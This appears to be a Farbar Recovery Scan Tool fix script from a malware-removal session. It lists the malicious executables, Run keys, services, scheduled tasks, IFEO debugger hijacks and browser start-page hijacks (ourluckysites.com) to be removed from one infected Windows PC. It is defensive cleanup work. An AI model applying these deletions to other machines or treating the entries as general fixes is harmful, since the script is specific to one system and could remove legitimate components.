CloseProcesses:
CreateRestorePoint:
C:\Program Files (x86)\Maoha\JiSuZip\JszipSvc.exe
C:\Program Files (x86)\Maoha
() C:\Windows\Temp\g4ED2.tmp.exe
() C:\Windows\Temp\gDA0.tmp.exe
() C:\Users\User\AppData\Roaming\qsbmbhsyi5n\jrtmlrcem5k.exe
() C:\Users\User\AppData\Roaming\fdgsooj4hcw\00vihxx214b.exe
(AC65GVJX) C:\Program Files\ESSRWBD05X\ESSRWBD05.exe
(AC65GVJX) C:\Program Files (x86)\yn1g3hqok2v\RX4FI.exe
(AC65GVJX) C:\Program Files\Q87F5DDL3H\Q87F5DDL3.exe
(AC65GVJX) C:\Program Files (x86)\yn1g3hqok2v\OLLUYEZ0BTTQ3XV.exe
() C:\Users\User\AppData\Roaming\wofdlyh3mtz\jub1mo14lha.exe
(D) C:\Program Files\C1QXFUW6Q6\6F856YMPL.exe
() C:\Users\User\AppData\Roaming\rwheqpsdj5s\ysfsny2kt1i.exe
() C:\Users\User\AppData\Roaming\rgj4geoi4kx\4ofrchtpykc.exe
(D) C:\Program Files\4EA0HTD2Q0\LQFWST2UM.exe
(D) C:\Program Files\6YRM7KI90W\XG4D6LLOO.exe
() C:\Users\User\AppData\Roaming\5k4r2bbnlq1\jt401bjv5lg.exe
(D) C:\Program Files\9IWAGBX2GV\9IWAGBX2G.exe
() C:\Users\User\AppData\Roaming\etexyvrgmh4\jatr0sdxxuh.exe
() C:\Users\User\AppData\Roaming\0awgowyo0ms\0nhwku5oyj2.exe
(D) C:\Program Files\BBZAW6C4VI\BBZAW6C4V.exe
(D) C:\Program Files\Y8MZE1ADXJ\Y8MZE1ADX.exe
() C:\Users\User\AppData\Roaming\ws35pv4otzu\exrir35so13.exe
(Z9OX3L) C:\Program Files\UTQATLWOKH\UTQATLWOK.exe
() C:\Users\User\AppData\Roaming\aesf43dd52u\r23xflwmacl.exe
() C:\Users\User\AppData\Roaming\isMiner\gw64-core2.exe
() C:\Users\User\AppData\Roaming\u5cbuyosxxt\221tqfnete3.exe
(D) C:\Program Files\ZROQ82ZM81\ZROQ82ZM8.exe
(D) C:\Program Files\TTXTUI1V1L\TTXTUI1V1.exe
() C:\Users\User\AppData\Roaming\1nuxxy02ibu\cjuwkzecetj.exe
() C:\Users\User\AppData\Roaming\ocaxkzchr0f\0y51erqgzkl.exe
(Z9OX3L) C:\Program Files\FBTVNMSQKX\FBTVNMSQK.exe
(Z9OX3L) C:\Program Files\T6XZH4WK6T\T6XZH4WK6.exe
() C:\Users\User\AppData\Roaming\4eqli1ue5wl\k1oii1uskfm.exe
C:\Users\User\AppData\Local\Temp\A5HHyOqb2\A5HHyOqb2.ex() C:\Users\User\AppData\Local\Temp\is-E3GIU.tmp\A5HHyOqb2.tmp
() C:\Users\User\AppData\Roaming\yq4jvrcg1f3\nbpe5thjjcq.exe
(Z9OX3L) C:\Program Files\T1O3O1QIVZ\T1O3O1QIV.exe
(Z9OX3L) C:\Program Files\AA2J6DNVEF\AA2J6DNVE.exe
(Microleaves LTD) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe
(Microleaves LTD) C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe   
C:\Program Files (x86)\Microleaves
HKLM\...\RunOnce: [OMEWPRODUCT_OSEO0] => C:\Program Files (x86)\yn1g3hqok2v\OLLUYEZ0BTTQ3XV.exe [592896 2017-05-30] (AC65GVJX) <===== ATTENTION
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
C:\Program Files (x86)\yn1g3hqok2v
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [background_fault] => C:\Users\User\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) <===== ATTENTION
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [0lceb25ruqa] => C:\Users\User\AppData\Roaming\qsbmbhsyi5n\jrtmlrcem5k.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [fm1vdlwdvkk] => C:\Users\User\AppData\Roaming\fdgsooj4hcw\00vihxx214b.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [2VZRB70N841RXSA] => C:\Program Files\ESSRWBD05X\ESSRWBD05.exe [1209344 2017-05-30] (AC65GVJX)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [84UOC78VGV223DT] => C:\Program Files (x86)\yn1g3hqok2v\RX4FI.exe [1209344 2017-05-30] (AC65GVJX)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [WPM8GXB720LN1QN] => C:\Program Files\Q87F5DDL3H\Q87F5DDL3.exe [1209344 2017-05-30] (AC65GVJX)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [YeaDesktop] => C:\Program Files (x86)\YeaDesktop\YeaDesktop.exe [3423744 2017-05-27] () <===== ATTENTION
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [5lobjawg2m4] => C:\Users\User\AppData\Roaming\wofdlyh3mtz\jub1mo14lha.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [PY84BHIZ5CMDX8M] => C:\Program Files\C1QXFUW6Q6\6F856YMPL.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [wkuisp3mqvr] => C:\Users\User\AppData\Roaming\rwheqpsdj5s\ysfsny2kt1i.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [lreja2y0wtw] => C:\Users\User\AppData\Roaming\rgj4geoi4kx\4ofrchtpykc.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [Z7C4D5BZ9F2WNLJ] => C:\Program Files\4EA0HTD2Q0\LQFWST2UM.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [TS83WLB4T2QBS4Q] => C:\Program Files\6YRM7KI90W\XG4D6LLOO.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [hqdfwyqa3qo] => C:\Users\User\AppData\Roaming\5k4r2bbnlq1\jt401bjv5lg.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [ZL9FDGZGNQG2OU1] => C:\Program Files\9IWAGBX2GV\9IWAGBX2G.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [fxza52bswmj] => C:\Users\User\AppData\Roaming\etexyvrgmh4\jatr0sdxxuh.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [iw1qu0gjd1y] => C:\Users\User\AppData\Roaming\0awgowyo0ms\0nhwku5oyj2.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [D1SB538RMCY644W] => C:\Program Files\BBZAW6C4VI\BBZAW6C4V.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [JS7TZIF2ETA7PN2] => C:\Program Files\Y8MZE1ADXJ\Y8MZE1ADX.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [gw64-core2 save settings] => C:\Users\User\AppData\Roaming\isMiner\minerstart.vbs [300 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [g3byw20yxke] => C:\Users\User\AppData\Roaming\aesf43dd52u\r23xflwmacl.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [c4em2sojr4g] => C:\Users\User\AppData\Roaming\u5cbuyosxxt\221tqfnete3.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [DBR5JQTT2Z4GTHD] => C:\Program Files\ZROQ82ZM81\ZROQ82ZM8.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [YVDZ46XHI9O1G98] => C:\Program Files\TTXTUI1V1L\TTXTUI1V1.exe [1228288 2017-05-30] (D)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [sogi1iwstjp] => C:\Users\User\AppData\Roaming\ws35pv4otzu\exrir35so13.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [1TSZ5QEJDTWRHKP] => C:\Program Files\UTQATLWOKH\UTQATLWOK.exe [1393664 2017-05-30] (Z9OX3L)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [verkzkohve5] => C:\Users\User\AppData\Roaming\1nuxxy02ibu\cjuwkzecetj.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [imdg3tpbdog] => C:\Users\User\AppData\Roaming\ocaxkzchr0f\0y51erqgzkl.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [XF6MGSXG7J4TM0T] => C:\Program Files\FBTVNMSQKX\FBTVNMSQK.exe [1393664 2017-05-30] (Z9OX3L)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [10WOWX1LT7D78XM] => C:\Program Files\T6XZH4WK6T\T6XZH4WK6.exe [1393664 2017-05-30] (Z9OX3L)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [r4eykzsegrv] => C:\Users\User\AppData\Roaming\4eqli1ue5wl\k1oii1uskfm.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [ixom4ida0f2] => C:\Users\User\AppData\Roaming\yq4jvrcg1f3\nbpe5thjjcq.exe [7680 2017-05-30] ()
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [4PM26MXLI3ASBRP] => C:\Program Files\T1O3O1QIVZ\T1O3O1QIV.exe [1393664 2017-05-30] (Z9OX3L)
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\...\Run: [8AB4MR1Q5RK6XOI] => C:\Program Files\AA2J6DNVEF\AA2J6DNVE.exe [1393664 2017-05-30] (Z9OX3L)
HKLM\...\Providers\qq42p2tw: C:\Program Files (x86)\Bekserikut Log\local64spl.dll [289792 2017-02-03] ()
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: No Name - {DC988DE4-DE48-11E6-9583-64006A5CFC23} - C:\Users\User\AppData\Roaming\Rerbadomatuvety\Reedgh.dll -> No File
ShellExecuteHooks: No Name - {A4CD8824-4049-11E7-9F11-64006A5CFC23} - C:\Program Files (x86)\Anucephstipaied\Wuteghtplejipy.dll [144896 2017-05-30] ()
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493987296&z=76fd28e9f0f5243a962c461g6zdt4cdtfbfm9o4t3c&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399
HKU\S-1-5-21-2501153814-4213713238-597727832-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493987296&z=76fd28e9f0f5243a962c461g6zdt4cdtfbfm9o4t3c&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493155113&z=5a73141da5e5154e285bd2fgaz5tac0g8w6w4g7e1t&from=che0812&uid=ST1000LM024XHN-M101MBB_S2TTJ9EC709399&q={searchTerms}
Handler: WSWSVCUchrome - {1CA93FF0-A218-44F1 -  No File
R2 ANSARE; C:\Users\User\AppData\Local\ANSARE\Snare.dll [826368 2017-05-08] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-27] (TODO: <公司名>) [File not signed] <==== ATTENTION
C:\ProgramData\BIT
C:\Users\User\AppData\Local\ANSARE
S2 CSHMDR; C:\Users\User\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 CWASRE; C:\Users\User\AppData\Local\CWASRE\Snare.dll [828416 2017-05-17] (IntertSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [117424 2017-04-21] () <==== ATTENTION
R2 Kitty; C:\Users\User\AppData\Local\Kitty\Kitty.dll [124928 2017-05-05] (kitty) [File not signed] <==== ATTENTION
C:\Users\User\AppData\Local\Kitty
S2 NPASRE; C:\Users\User\AppData\Local\NPASRE\Snare.dll [830464 2017-05-12] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 SANARE; C:\Users\User\AppData\Local\SANARE\Snare.dll [826368 2017-05-04] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [2889896 2016-09-15] (Microsoft Corporation)
S2 snare; C:\Users\User\AppData\Local\snare\Snare.dll [1050112 2017-05-24] (IntertSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 SNAREA; C:\Users\User\AppData\Local\SNAREA\Snare.dll [826368 2017-05-03] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 SNARER; C:\Users\User\AppData\Roaming\SNARER\Snarer.dll [792576 2017-04-07] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\Sh4Service.exe [868024 2017-05-30] (Enigma Software Group USA, LLC.)
S2 terana; C:\Users\User\AppData\Local\terana\terana.dll [908288 2017-05-27] (IntertSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 VNASRE; C:\Users\User\AppData\Local\VNASRE\Snare.dll [826880 2017-05-10] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
R2 WANARE; C:\Users\User\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [File not signed] <==== ATTENTION
S2 WindowsOfficeSrv; C:\ProgramData\Microsoft\OneDrive\Uploader.dll [108544 2017-04-21] () [File not signed] <==== ATTENTION
R2 WinSAPSvc; C:\Users\User\AppData\Roaming\WinSAPSvc\WinSAP.dll [1932800 2017-05-27] () [File not signed] <==== ATTENTION
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]
S2 InstallerService; C:\Program Files\TrueKey\Mcafee.TrueKey.InstallerService.exe [X]
R1 iSafeKrnl; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys [262344 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
S3 iSafeKrnlBoot; C:\Windows\System32\DRIVERS\iSafeKrnlBoot.sys [55056 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
S1 iSafeKrnlKit; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys [110112 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlMon; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [52440 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeKrnlR3; C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys [103904 2016-05-23] (Elex do Brasil Participações Ltda) <==== ATTENTION
R1 iSafeNetFilter; C:\Windows\System32\DRIVERS\iSafeNetFilter.sys [52392 2016-05-19] (Elex do Brasil Participações Ltda) <==== ATTENTION
S1 mbzhufuj; \??\C:\Windows\system32\drivers\mbzhufuj.sys [X]
2017-05-30 23:12 - 2017-05-30 23:12 - 00000000 ____D C:\Users\User\AppData\Roaming\yq4jvrcg1f3
2017-05-30 23:12 - 2017-05-30 23:12 - 00000000 ____D C:\Users\User\AppData\Roaming\4eqli1ue5wl
2017-05-30 23:12 - 2017-05-30 23:12 - 00000000 ____D C:\Program Files\T1O3O1QIVZ
2017-05-30 23:12 - 2017-05-30 23:12 - 00000000 ____D C:\Program Files\AA2J6DNVEF
2017-05-30 22:42 - 2017-05-30 23:12 - 00000000 ____D C:\Program Files (x86)\Anucephstipaied
2017-05-30 22:42 - 2017-05-30 22:42 - 00000000 ____D C:\Users\User\AppData\Roaming\ocaxkzchr0f
2017-05-30 22:42 - 2017-05-30 22:42 - 00000000 ____D C:\Users\User\AppData\Roaming\1nuxxy02ibu
2017-05-30 22:42 - 2017-05-30 22:42 - 00000000 ____D C:\Users\User\AppData\Local\Kiwertphiverward
2017-05-30 22:42 - 2017-05-30 22:42 - 00000000 ____D C:\Program Files\T6XZH4WK6T
2017-05-30 22:42 - 2017-05-30 22:42 - 00000000 ____D C:\Program Files\FBTVNMSQKX
2017-05-30 22:41 - 2017-05-30 22:41 - 00000000 ____D C:\Users\User\AppData\Roaming\ws35pv4otzu
2017-05-30 22:41 - 2017-05-30 22:41 - 00000000 ____D C:\Program Files\UTQATLWOKH
2017-05-30 19:27 - 2017-05-30 19:27 - 00000000 ____D C:\Users\User\AppData\Roaming\u5cbuyosxxt
2017-05-30 19:27 - 2017-05-30 19:27 - 00000000 ____D C:\Users\User\AppData\Roaming\aesf43dd52u
2017-05-30 19:27 - 2017-05-30 19:27 - 00000000 ____D C:\Program Files\ZROQ82ZM81
2017-05-30 19:27 - 2017-05-30 19:27 - 00000000 ____D C:\Program Files\TTXTUI1V1L
2017-05-30 19:27 - 2017-05-30 19:27 - 00000000 ____D C:\Program Files (x86)\Prfasaretaly
2017-05-30 19:18 - 2017-05-30 19:18 - 00003294 _____ C:\Windows\System32\Tasks\Updater_Online_Application
2017-05-30 19:18 - 2017-05-30 19:18 - 00003258 _____ C:\Windows\System32\Tasks\Online Application V2G3
2017-05-30 19:18 - 2017-05-30 19:18 - 00003258 _____ C:\Windows\System32\Tasks\Online Application V2G2
2017-05-30 19:18 - 2017-05-30 19:18 - 00003258 _____ C:\Windows\System32\Tasks\Online Application V2G1
2017-05-30 19:18 - 2017-05-30 19:18 - 00000400 _____ C:\Windows\Tasks\Updater_Online_Application.job
2017-05-30 19:18 - 2017-05-30 19:18 - 00000368 _____ C:\Windows\Tasks\Online Application V2G3.job
2017-05-30 19:18 - 2017-05-30 19:18 - 00000368 _____ C:\Windows\Tasks\Online Application V2G2.job
2017-05-30 19:18 - 2017-05-30 19:18 - 00000368 _____ C:\Windows\Tasks\Online Application V2G1.job
2017-05-30 19:18 - 2017-05-30 19:18 - 00000000 ____D C:\Program Files (x86)\Microleaves
2017-05-30 19:17 - 2017-05-30 19:17 - 00000000 ____D C:\Users\User\AppData\Roaming\etexyvrgmh4
2017-05-30 19:17 - 2017-05-30 19:17 - 00000000 ____D C:\Users\User\AppData\Roaming\0awgowyo0ms
2017-05-30 19:17 - 2017-05-30 19:17 - 00000000 ____D C:\Program Files\Y8MZE1ADXJ
2017-05-30 19:17 - 2017-05-30 19:17 - 00000000 ____D C:\Program Files\BBZAW6C4VI
2017-05-30 19:14 - 2017-05-30 19:14 - 00003410 _____ C:\Windows\System32\Tasks\SpyHunter4Startup
2017-05-30 19:14 - 2017-05-30 19:14 - 00001132 _____ C:\Users\User\Desktop\SpyHunter.lnk
2017-05-30 19:14 - 2017-05-30 19:14 - 00000000 ____D C:\Users\User\AppData\Roaming\5k4r2bbnlq1
2017-05-30 19:14 - 2017-05-30 19:14 - 00000000 ____D C:\Program Files\9IWAGBX2GV
2017-05-30 18:48 - 2017-05-30 18:48 - 00006076 _____ C:\Windows\System32\Tasks\Coobeck Monitor
2017-05-30 18:48 - 2017-05-30 18:48 - 00000000 ____D C:\Users\User\AppData\Roaming\Microleaves
2017-05-30 18:48 - 2017-05-30 18:48 - 00000000 ____D C:\Users\User\AppData\Local\Draveingplererward
2017-05-30 18:48 - 2017-05-30 18:48 - 00000000 ____D C:\Users\User\AppData\Local\AdvinstAnalytics
2017-05-30 18:48 - 2017-05-30 18:48 - 00000000 ____D C:\Program Files (x86)\Coobeck Monitor
2017-05-30 18:47 - 2017-05-30 18:53 - 00000000 ____D C:\Program Files (x86)\SystemHealer
2017-05-30 18:47 - 2017-05-30 18:47 - 00140800 _____ C:\Users\User\AppData\Local\installer.dat
2017-05-30 18:47 - 2017-05-30 18:47 - 00011568 _____ C:\Users\User\AppData\Local\InstallationConfiguration.xml
2017-05-30 18:47 - 2017-05-30 18:47 - 00000000 ____D C:\Users\User\AppData\Roaming\rwheqpsdj5s
2017-05-30 18:47 - 2017-05-30 18:47 - 00000000 ____D C:\Users\User\AppData\Roaming\rgj4geoi4kx
2017-05-30 18:47 - 2017-05-30 18:47 - 00000000 ____D C:\Program Files\6YRM7KI90W
2017-05-30 18:47 - 2017-05-30 18:47 - 00000000 ____D C:\Program Files\4EA0HTD2Q0
2017-05-30 18:46 - 2017-05-30 18:46 - 00000000 ____D C:\Users\User\AppData\Roaming\wofdlyh3mtz
2017-05-30 18:46 - 2017-05-30 18:46 - 00000000 ____D C:\Program Files\C1QXFUW6Q6
2017-05-30 18:17 - 2017-05-30 19:27 - 00000000 ____D C:\Program Files (x86)\BestZiper
2017-05-30 18:17 - 2017-05-30 18:18 - 00000000 ____D C:\Program Files (x86)\YeaDesktop
2017-05-30 18:17 - 2017-05-30 18:17 - 00016836 _____ C:\Windows\System32\Tasks\Webwatche Frames
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Users\User\AppData\Roaming\UCChannel
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Users\User\AppData\Roaming\gplyra
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Users\User\AppData\Roaming\fdgsooj4hcw
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Users\User\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Users\Public\Documents\XMUpdate
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Program Files\Q87F5DDL3H
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Program Files\ESSRWBD05X
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Program Files (x86)\yn1g3hqok2v
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Program Files (x86)\mgdisk
2017-05-30 18:17 - 2017-05-30 18:17 - 00000000 ____D C:\Program Files (x86)\Maoha
2017-05-30 18:16 - 2017-05-30 19:26 - 00000000 ____D C:\Users\User\AppData\Roaming\isMiner
2017-05-30 18:16 - 2017-05-30 18:17 - 00000000 ____D C:\Users\User\AppData\Roaming\qsbmbhsyi5n
2017-05-13 03:53 - 2017-05-13 03:53 - 00000000 ____D C:\Program Files (x86)\{D09203A6-089D-4E83-8BBD-03E9C0D6366D}
2017-05-12 23:52 - 2017-05-12 23:52 - 00000000 ____D C:\Program Files (x86)\{1866758A-F2ED-4345-9F97-A0C9D28E924B}
2017-05-12 16:51 - 2017-05-12 16:51 - 00000000 ____D C:\Program Files (x86)\{B758A47C-DD21-45FD-871C-8C2768CE825D}
2017-05-12 14:49 - 2017-05-26 01:01 - 00000000 _____ C:\Windows\SysWOW64\3333
2017-05-12 14:49 - 2017-05-26 01:01 - 00000000 _____ C:\Windows\SysWOW64\2222
2017-05-12 00:29 - 2017-05-12 00:29 - 00000000 ____D C:\Reerdition
2017-05-12 00:29 - 2017-05-12 00:29 - 00000000 ____D C:\Program Files (x86)\{07A9AA6A-EC40-449C-9D38-6D865A6766DA}
2017-05-12 00:06 - 2017-05-16 22:26 - 00000000 _____ C:\Windows\SysWOW64\3333333
2017-05-12 00:06 - 2017-05-12 00:06 - 00000000 ____D C:\Program Files (x86)\Bagsarah
2017-05-12 00:05 - 2017-05-17 15:24 - 00000000 _____ C:\Windows\SysWOW64\00
2017-05-09 17:21 - 2017-05-27 03:44 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-17 15:24 - 2017-04-21 17:42 - 00000000 _____ C:\Windows\SysWOW64\11
2017-05-16 22:26 - 2017-04-28 00:36 - 00000000 _____ C:\Windows\SysWOW64\1111111
2017-05-17 15:26 - 2017-04-28 00:37 - 00000000 _____ C:\Windows\SysWOW64\22
C:\Program Files (x86)\yn1g3hqok2v\OLLUYEZ0BTTQ3XV.exe
C:\Users\User\AppData\Local\background_fault\aswRD.exe
C:\Program Files (x86)\YeaDesktop\YeaDesktop.exe
Task: {23F1BC68-3EBD-45D1-988B-31BA23C88A7E} - System32\Tasks\{ECDE3A19-C0BC-4E09-B884-B9D2C8D6FDC6} => pcalua.exe -a "C:\Program Files (x86)\YeaDesktop\unins000.exe"
Task: {2CB1C648-DAB8-4E23-A5F9-445D2E71EE7F} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {8085B184-9AA8-40EF-9C6D-098C132C740A} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-04-18] (Microleaves) <==== ATTENTION
